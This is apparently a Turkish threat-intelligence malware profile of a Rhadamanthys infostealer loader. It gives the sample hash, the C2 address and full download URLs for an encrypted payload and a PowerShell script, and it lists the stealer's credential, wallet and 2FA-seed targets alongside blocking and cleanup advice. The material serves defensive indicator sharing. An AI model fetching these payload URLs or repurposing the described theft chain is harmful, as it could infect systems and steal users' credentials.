Manuel Statik Analiz (LLM Okumali) — Rhadamanthys Stealer Loader | Tehdit: KRITIK
Dosya Kimligi
SHA256 a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
Dosya Adi metacore-loader.exe
Boyut 171.520 byte
String Sayisi 1.176
Cleartext C2 ve Payload URL
Kritik IOC: Bu Rhadamanthys loader orneginde C2 IP adresi ve tam payload URL'leri cleartext olarak bulunmaktadir!
C2 Sunucusu: 176.46.152.62
Port: 5858
Protokol: HTTP
Payload Indirme URL:
http://176.46.152.62:5858/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe
PowerShell Script URL:
http://176.46.152.62:5858/dadaasads_new.ps1
Yukleme Sekli
Loader (metacore-loader.exe) hedef sisteme calistirilir
C2 sunucusu 176.46.152.62:5858 uzerinden sifreli Rhadamanthys payload'ini indirir
Ayni C2'den dadaasads_new.ps1 PowerShell scripti cekerek ek islemler yapar
Payload dosyasi ismindeki _crypted_build on-the-fly sifreleme yapildigini gosterir
Rhadamanthys Yetenekleri (Aile)
Kategori Hedefler
Tarayicilar 100+ tarayici — sifre, cookie, kredi karti, oturum tokenleri
Kripto Cuzdanlar MetaMask, Exodus, Atomic, Electrum, 30+ cuzdan uzantisi
Email Outlook, Thunderbird — kimlik bilgileri
VPN NordVPN, ProtonVPN, OpenVPN yapılandirma dosyalari
2FA Google Authenticator, Authy seed'leri
Sistem Screenshot, sistem bilgisi, hardware fingerprint
Rhadamanthys Hakkinda
Rhadamanthys, 2022 yilinda ortaya cikan gelismis bir C++ MaaS (Malware-as-a-Service) infostealerdir. Plugin tabanli mimarisi, 100+ tarayici destegi ve anti-analiz teknikleriyle dikkat ceker. LuaJIT scripting engine ile plugin yukleyebilir. Yeralt piyasasinda en pahali ve gelismis stealerlardan biri olarak konumlandirilmaktadir.
Tespit / Temizlik
Ag katmaninda 176.46.152.62:5858 trafiği engelle/izle
PowerShell execution policy ile yetkisiz .ps1 calismalarini engelle
EDR sistemlerine bu IP ve hash'i ekle
Etkilenen sistemlerde tarayici credential'larini sifirla
IOC
SHA256 a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
C2 IP 176.46.152.62
C2 Port 5858
Payload URL http://176.46.152.62:5858/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe
PS URL http://176.46.152.62:5858/dadaasads_new.ps1
Rhadamanthys — Malware Profile
Rhadamanthys, 2022 de ortaya cikan C++ premium infostealer ailesidir. 250 USD/ay abonelik. Tarayici, kripto, FTP, VPN, email, oyun platformlarini hedefler. Loader + stealer DLL mimarisi.
Technical Details
C++, HTTP/HTTPS C2, modular plugin-tabanli mimari, genis tarayici credential theft, kripto wallet scraper (MetaMask/Phantom), steganography destekli payload, fingerprint (UUID/HWID), process injection
Capabilities & Behavior
Tarayıcı Kimlik Bilgileri
FTP/SSH İstemci Şifreleri
IOC List
(1 indicators)
# SHA256
a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
Type Value Note
sha256
a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
C2 Servers
(4 recorded servers for this family)
Address
Type
Port
Protocol
Status
Country
94.131.106.195
ip
443
HTTPS
inactive
RU
185.106.122.144
ip
443
HTTPS
inactive
CZ
185.106.120.55
ip
80
HTTP
inactive
RU
176.46.152.62
ip
5858
HTTP
inactive
—
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.